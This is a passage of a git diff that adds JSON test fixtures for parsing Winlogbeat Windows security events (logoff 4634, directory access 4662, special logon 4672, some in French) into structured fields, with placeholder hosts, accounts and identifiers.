Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", + "event": { + "action": "Logoff", + "code": "4634", + "kind": "event", + "module": "security", + "original": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:42:47.895000Z", + "action": { + "id": 4634, + "outcome": "success", + "properties": { + "LogonType": "3", + "TargetDomainName": "J_DOE", + "TargetLogonId": "0x5ed35bb6", + "TargetUserName": "ACCOUNT", + "TargetUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "J_DOE", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "J_DOE", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.jdoe.com", + "event_id": "4634", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x5ed35bb6", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 704, + "thread": { + "id": 6336 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "15983780774", + "task": "Logoff" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json new file mode 100644 index 000000000..3f1de8e53 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4662.json @@ -0,0 +1,105 @@ +{ + "input": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", + "event": { + "action": "Directory Service Access", + "code": "4662", + "kind": "event", + "module": "security", + "original": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet :\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:07:11.844000Z", + "action": { + "id": 4662, + "outcome": "success", + "properties": { + "AccessList": "%%7688\n\t\t\t\t", + "AccessMask": "0x100", + "AdditionalInfo": "-", + "HandleId": "0x0", + "ObjectName": "%{12345678-abcd-ef90-1234-abcdef123456}", + "ObjectServer": "DS", + "ObjectType": "%{11111111-aaaa-2222-bbbb-333333333333}", + "OperationType": "Object Access", + "Properties": "%%7688\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0xc2b9d138", + "SubjectUserName": "ACCOUNT01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-345678901234", + "id": "abcdefab-cdef-abcd-efab-cdefabcdefab", + "name": "ACCOUNT01", + "type": "winlogbeat", + "version": "8.12.2" + }, + "host": { + "architecture": "x86_64", + "hostname": "account01", + "id": "11111111-2222-aaaa-bbbb-333333333333", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "account01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "account01" + ], + "ip": [ + "1.2.3.4" + ] + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT01.domain.local", + "event_id": "4662", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0xc2b9d138" + }, + "opcode": "Informations", + "process": { + "pid": 744, + "thread": { + "id": 864 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "476080242", + "task": "Directory Service Access" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json new file mode 100644 index 000000000..ec935a02c --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4672.json @@ -0,0 +1,82 @@ +{ + "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", + "event": { + "action": "Special Logon", + "code": "4672", + "kind": "event", + "module": "security", + "original": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:08:50.647000Z", + "action": { + "id": 4672, + "outcome": "success", + "properties": { + "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x40c158b6", + "SubjectUserName": "USER01-WIN$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "USER01-WIN.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "USER01-WIN" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "USER01-WIN" + }, + "winlog": { + "activity_id": "{abcdefab-1234-cdef-5678-901234abcdef}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "USER01-WIN.domain.priv", + "event_id": "4672", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x40c158b6" + }, + "opcode": "Informations", + "process": { + "pid": 828, + "thread": { + "id": 27812 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "288206963", + "task": "Special Logon" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json new file mode 100644 index 000000000..22840d53c --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4689.json @@ -0,0 +1,88 @@ +{ + "input": { + "message": 